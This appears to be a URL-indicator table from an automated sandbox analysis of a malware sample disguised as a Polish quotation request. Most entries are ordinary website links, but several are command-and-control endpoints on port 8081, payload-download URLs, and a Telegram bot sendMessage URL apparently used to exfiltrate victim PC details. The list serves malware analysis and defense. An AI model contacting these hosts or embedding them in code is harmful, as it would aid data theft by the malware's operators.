                                                                  https://zxq.net/wp-content/uploads/2024/10/Snoring-and-Sleep-Apnea.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                    unknown
                                                                    https://zxq.net/what-happened-to-the-old-zxq-website/hYZexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://zxq.net/cmsys.gifzexplorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumbcmsys.cmn.4.drfalse
                                                                          unknown
                                                                          https://zxq.net/what-happened-to-the-old-zxq-website/Yrexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://chrome.google.com/webstore?hl=enRegSvcs.exe, 0000000A.00000002.4486046867.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://vccmd01.t35.com/cmsys.gifexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://vccmd01.zxq.netst.exeexplorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://vccmd01.zxq.net/cmsys.giftXfexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://zxq.net/cmsys.gifeexplorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://zxq.net/transform-your-space-simple-home-repairs-for-singaporeans/cmsys.cmn.4.drfalse
                                                                                        unknown
                                                                                        http://vccmd01.t35.com/cmsys.gifq.net/cmsys.gifetVfexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://vccmd01.zxq.net/cmsys.gif5.com/cmsys.gifexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://vccmd01.zxq.net/cmsys.gif#xexplorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://zxq.net/wp-content/uploads/2022/02/ZXQ.pngcmsys.cmn.4.drfalse
                                                                                                unknown
                                                                                                https://zxq.net/about-us/cmsys.cmn.4.drfalse
                                                                                                  unknown
                                                                                                  http://checkip.dyndns.org/qzapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://zxq.net/#logocmsys.cmn.4.drfalse
                                                                                                    unknown
                                                                                                    https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpbr_Wexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://zxq.net/what-happened-to-the-old-zxq-website/C:explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://zxq.net/cmsys.gifBexplorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://zxq.net/news/technology/cmsys.cmn.4.drfalse
                                                                                                            unknown
                                                                                                            https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.1explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                              unknown
                                                                                                              http://vccmd03.googlecode.com/files/cmsys.gif:aexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://zxq.net/wp-json/explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2177725240.0000000000725000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                  unknown
                                                                                                                  https://zxq.net/what-happened-to-the-old-zxq-website/brexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://vccmd01.googlecode.com/files/cmsys.gif:aexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://zxq.net/wp-content/uploads/2024/10/Snoring-and-Sleep-Apnea-1024x576.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                        unknown
                                                                                                                        https://reallyfreegeoip.org/xml/zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://www.office.com/RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://zxq.net/wp-content/uploads/2024/10/Snoring-and-Sleep-Apnea-150x84.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                            unknown
                                                                                                                            https://zxq.net/wp-content/uploads/2024/10/How-to-Handle-Quick-Home-Repairs-Without-Professional-Helcmsys.cmn.4.drfalse
                                                                                                                              unknown
                                                                                                                              https://zxq.net/cmd01.zxq.net/cmsys.giftXfexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://vccmd03.googlecode.com/files/cmsys.gif)aexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://vccmd01.t35.com/cmsys.giftXfexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://vccmd01.zxq.net/cmsys.gifetVfexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://zxq.net/what-happened-to-the-old-zxq-website/rrC:explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://vccmd02.googlecode.com/files/cmsys.gif)aexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                            unknown
                                                                                                                                            http://vccmd02.googlecode.com/files/cmsys.gif3explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://schema.orgexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.ecosia.org/newtab/RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-1024x576.pexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://zxq.net/what-happened-to-the-old-zxq-website/nOXexplorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://zxq.net/wp-content/uploads/2024/10/Transform-Your-Space-Simple-Home-Repairs-for-Singaporeanscmsys.cmn.4.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://aborters.duckdns.org:8081zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://zxq.net/?s=explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://anotherarmy.dns.army:8081zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://zxq.net/what-happened-to-the-old-zxq-website/#webpageexplorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://zxq.net/cmsys.gife(Yexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://zxq.net/news/entertainment/cmsys.cmn.4.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://zxq.net/wp-includes/wlwmanifest.xmlexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://reallyfreegeoip.orgRegSvcs.exe, 0000000A.00000002.4486046867.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-300x117.pngcmsys.cmn.4.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://zxq.net/wp-content/uploads/2024/10/Snoring-and-Sleep-Apnea-768x432.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://zxq.net/snoring-and-sleep-apnea/cmsys.cmn.4.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://zxq.net/wp-content/uploads/2024/10/Essential-Factors-to-Consider-for-Effective-Water-Extractcmsys.cmn.4.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://zxq.net/wuexplorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://zxq.net/what-happened-to-the-old-zxq-website/-explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://zxq.net/wp-content/uploads/2024/10/Choosing-the-Right-Commercial-Cleaning-Company-for-Your-Bcmsys.cmn.4.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://zxq.net/write-for-us/cmsys.cmn.4.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://vccmd02.googlecode.com/files/cmsys.gif:aexplorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://zxq.net/essential-factors-to-consider-for-effective-water-extraction-services/cmsys.cmn.4.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://vccmd03.googlecode.com/files/cmsys.gif&explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20aRegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
